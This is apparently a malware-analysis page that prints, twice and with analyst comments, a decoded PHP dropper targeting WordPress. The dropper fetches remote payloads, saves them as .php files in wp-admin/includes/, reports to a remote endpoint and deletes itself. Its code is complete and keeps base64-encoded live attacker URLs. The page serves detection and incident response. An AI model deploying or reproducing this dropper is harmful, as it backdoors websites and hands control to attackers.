
PHP Decode

malware<?phperror_reporting(0);functionbase64_url_decode($input){returnbase64_decode(strtr..

Decoded Output download

malware<?phperror_reporting(0);
// ANALYST NOTES. The sample is shown as captured, with inter-token whitespace stripped; only
// line breaks and comments have been added, no code token has been changed.
// What it is: a dropper. It downloads two remote .txt payloads, writes them as .php files under
// wp-admin/includes/, reports the outcome to a remote endpoint, and deletes its own file after a
// successful write. error_reporting(0) above suppresses PHP error output while it runs.
// Triage pointers: look for temp.php / logs.php under wp-admin/includes/ (compare the directory
// against official WordPress core checksums), for outbound requests to the two hosts decoded
// below, and for the web-server log entry of the request that executed this script. Because the
// dropper removes itself, not finding it on disk does not mean the host is clean.

// Helper: translates the URL-safe base64 alphabet ('-', '_') back to ('+', '/') before decoding.
functionbase64_url_decode($input){returnbase64_decode(strtr($input,'-_','+/'));}

// Payload sources, base64-encoded so the URLs are not visible to a plain-text search.
// Decoded (defanged): hxxp://ytkj77[.]com/include/qrcode/temp.txt and .../qrcode/logs.txt (plain HTTP).
$remote_file_urls_base64=array('aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvdGVtcC50eHQ=','aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvbG9ncy50eHQ=');
$remote_file_urls=array();
foreach($remote_file_urls_base64as$url_base64){$remote_file_urls[]=base64_url_decode($url_base64);}

// Relative drop path: it resolves against the working directory of the PHP request
// (presumably the WordPress root; confirm per incident).
$save_to_dir='wp-admin/includes/';

// $url: full URL of the request that ran this script, rebuilt from $_SERVER values.
$url="http".(isset($_SERVER['HTTPS'])?"s":"")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
// $current_url: scheme://host only; used below to report where the dropped file is reachable.
$current_protocol=$_SERVER['REQUEST_SCHEME'];$current_domain=$_SERVER['HTTP_HOST'];$current_url=$current_protocol."://".$current_domain;
// One-shot flags: at most one failure report and one success report are sent per run.
$failure_notification_sent=false;$success_notification_sent=false;

foreach($remote_file_urlsas$remote_file_url){
    // temp.txt -> temp.php, logs.txt -> logs.php: the payload is hosted as text and becomes
    // executable PHP only through this rename on the target host.
    $file_name=basename($remote_file_url);$file_name=str_replace('.txt','.php',$file_name);$save_to_path=$save_to_dir.$file_name;
    // Fetch the payload body into a string; CURLOPT_RETURNTRANSFER is the only option set
    // (no timeout, no check of what was received).
    $ch=curl_init($remote_file_url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$file_content=curl_exec($ch);curl_close($ch);
    if($file_content===false){
        // Download failed: report this script's own URL, once.
        if(!$failure_notification_sent){
            // Notification endpoint, decoded (defanged): hxxps://wujie[.]app[.]tc/api.php with
            // token, type, title and content query parameters; the reported URL is appended as
            // the content value, followed by an empty note parameter.
            $urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);
            // CURLOPT_RETURNTRANSFER is not set on this handle, so the endpoint's response body
            // is written to this script's output.
            $curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);
            $failure_notification_sent=true;}
        // The string literal below contains a literal newline and must stay split across lines.
        echo"
";}else{
        $save_result=file_put_contents($save_to_path,$file_content);
        if($save_result!==false){
            // Write succeeded: report scheme://host/wp-admin/includes/temp.php, once. The file
            // name is hard-coded, so temp.php is reported even if the file just written is logs.php.
            if(!$success_notification_sent){
                $urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);
                $curl=curl_init($decoded_url.$current_url.'/'.$save_to_dir.'temp.php'.'&note=');curl_exec($curl);curl_close($curl);
                $success_notification_sent=true;}
            // Anti-forensics: delete the dropper's own file after each successful write. The
            // loop keeps running because the script is already loaded.
            $file=__FILE__;unlink($file);
        }else{
            // Write failed: same one-shot failure report as the download-failure branch.
            if(!$failure_notification_sent){
                $urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);
                $curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);
                $failure_notification_sent=true;}}}}?>


Original Code

malware<?phperror_reporting(0);
// ANALYST NOTES. This is the submitted sample as captured, with inter-token whitespace stripped;
// only line breaks and comments have been added. It is a self-deleting dropper: it downloads two
// remote .txt payloads, saves them as .php under wp-admin/includes/, and reports the result to a
// remote endpoint. PHP errors are suppressed by error_reporting(0) above.
// For response: check wp-admin/includes/ for temp.php and logs.php (compare against official
// WordPress core checksums), review egress logs for the hosts decoded below, and do not treat
// the absence of the dropper file as evidence that it never ran.

// Helper: converts URL-safe base64 characters ('-', '_') to ('+', '/') and decodes.
functionbase64_url_decode($input){returnbase64_decode(strtr($input,'-_','+/'));}

// Base64-encoded payload URLs. Decoded (defanged):
// hxxp://ytkj77[.]com/include/qrcode/temp.txt and hxxp://ytkj77[.]com/include/qrcode/logs.txt
$remote_file_urls_base64=array('aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvdGVtcC50eHQ=','aHR0cDovL3l0a2o3Ny5jb20vaW5jbHVkZS9xcmNvZGUvbG9ncy50eHQ=');
$remote_file_urls=array();
foreach($remote_file_urls_base64as$url_base64){$remote_file_urls[]=base64_url_decode($url_base64);}

// Relative target directory for the dropped files.
$save_to_dir='wp-admin/includes/';
// URL of the current request (scheme, host and request URI taken from $_SERVER).
$url="http".(isset($_SERVER['HTTPS'])?"s":"")."://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
// Site base URL (scheme://host), used in the success report.
$current_protocol=$_SERVER['REQUEST_SCHEME'];$current_domain=$_SERVER['HTTP_HOST'];$current_url=$current_protocol."://".$current_domain;
// Each kind of report (failure, success) is sent at most once per run.
$failure_notification_sent=false;$success_notification_sent=false;

foreach($remote_file_urlsas$remote_file_url){
    // Local name is the remote base name with '.txt' replaced by '.php'.
    $file_name=basename($remote_file_url);$file_name=str_replace('.txt','.php',$file_name);$save_to_path=$save_to_dir.$file_name;
    // Download the payload into $file_content; curl_exec() yields false on failure.
    $ch=curl_init($remote_file_url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$file_content=curl_exec($ch);curl_close($ch);
    if($file_content===false){
        // Download failure: send the request URL to the notification endpoint.
        if(!$failure_notification_sent){
            // Decoded (defanged): hxxps://wujie[.]app[.]tc/api.php with token, type, title and
            // content query parameters; the reported URL becomes the content value.
            $urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);
            $curl=curl_init($decoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);
            $failure_notification_sent=true;}
        echo"\n";
    }else{
        $save_result=file_put_contents($save_to_path,$file_content);
        if($save_result!==false){
            // Payload written: report the location of temp.php under the site base URL.
            if(!$success_notification_sent){
                $urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);
                $curl=curl_init($decoded_url.$current_url.'/'.$save_to_dir.'temp.php'.'&note=');curl_exec($curl);curl_close($curl);
                $success_notification_sent=true;}
            // Self-deletion: removes the dropper file itself once a payload has been written.
            $file=__FILE__;unlink($file);
        }else{
            // Write failure: send the request URL to the notification endpoint.
            if(!$failure_notification_sent){
                $urls="aHR0cHM6Ly93dWppZS5hcHAudGMvYXBpLnBocD90b2tlbj13dXNoYW5nJnR5cGU9Z2V0JnRpdGxlPeadpeS/oemAmuefpSZjb250ZW50PQ==";$decoded_url=base64_decode($urls);
                // NOTE(review): the captured text breaks the line inside the variable name in the
                // next statement; this looks like a wrapping artifact of the page, not of the sample.
                $curl=curl_init($d
ecoded_url.$url.'&note=');curl_exec($curl);curl_close($curl);
                $failure_notification_sent=true;}}}}?>

Function Calls

None

Variables

None

Stats

MD5 16a6aafa9800cf06cb044850f7a253b0
Eval Count 0
Decode Time 55 ms